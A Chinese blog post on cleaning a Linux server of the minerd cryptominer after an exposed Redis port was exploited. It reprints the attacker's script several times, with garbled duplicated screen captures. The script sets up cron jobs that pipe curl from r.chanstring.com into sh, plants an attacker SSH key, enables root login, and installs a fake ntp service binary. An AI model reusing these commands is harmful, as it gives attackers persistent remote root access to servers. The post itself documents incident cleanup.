linux中了minerd之后的完全清理过程(详解)
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊
某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了
下面就是清理过程
第一步
1.立即停止redis服务,修改端口权限,增加密码措施
2.按照网上的资料 删除 crontab 里的两个内容
sudo rm /var/spool/cron/root
sudo rm /var/spool/cron/crontabs/root
3.知己知彼,百战不殆,研究病毒的初始话文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
|
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
"pm.sh" 28L, 1470C 10,1-8 顶端 export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll /cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll /cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITT
shREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZZ 7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kvv 9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1yy 993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK755 NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
10,1-8 顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/rr oot mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/cc rontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOcc
9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLL Kn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm88 gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBrr o4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then 10,1-8 顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/roo ot if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yWW
8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQQ V8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXX mVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root"" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
@ 10,1-8 顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/AA
g1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txLL 6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNyy tbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK77
5NEOiq33 && /opt/KHK75NEOiq33 -Install fi
fi 10,1-8 顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TT
dRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6ww L4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdd Y7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opp
t/KHK75NEOiq33 -Install fi
fi /etc/init.d/ntp start ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 10,1-8 顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYY
pLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbb BXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Instaa
ll fi
fi /etc/init.d/ntp start ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9 ~ ~ ~ ~ ~ 10,1-8 全部
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999 3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
fi
fi /etc/init.d/ntp start ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9 |
得到结果
1.删除crontab的配置文件,如上我们已经删除,涉及的代码
1
2
3
|
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root |
2.删除 这个是用来免密码登陆的
rm -f ~/.ssh/authorized_keys*
rm -f ~/.ssh/KHK75NEOiq
你甚至可以直接把.ssh这个目录删除掉
涉及的代码
1
2
3
4
5
6
7
8
9
10
11
12
|
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999 3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi |
3.删除 /opt/这个目录 这玩意是第四步的服务产生的
4.删除服务
service ntp stop
rm /etc/init.d/ntp
rm /usr/sbin/ntp
涉及的代码
1
2
3
4
5
6
|
if [ ! -f "/etc/init.d/ntp" ]; then if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
fi
fi |
如上的代码,下载了一个8M的程序,是安装了什么东西,楼主也不知道,但是接下来的代码暴露了行踪
/etc/init.d/ntp start
这行代码启动了ntp这个服务,百度搜了下说是个时间服务,其实这玩意是病毒服务,打开这个文件,找到可执行文件/usr/sbin/ntp 发现文件和那个8m的文件一个字节不差
所以删除这个文件
最后
ps aux|grep minerd
kill 掉所有的进程,ok修复结束
半小时之后
ps aux|grep minerd
minerd进程不再出现
以上就是小编为大家带来的linux中了minerd之后的完全清理过程(详解)全部内容了,希望大家多多支持~
本文由主机测评网发布,不代表主机测评网立场,转载联系作者并注明出处:https://zhuji.jb51.net/linux/5899.html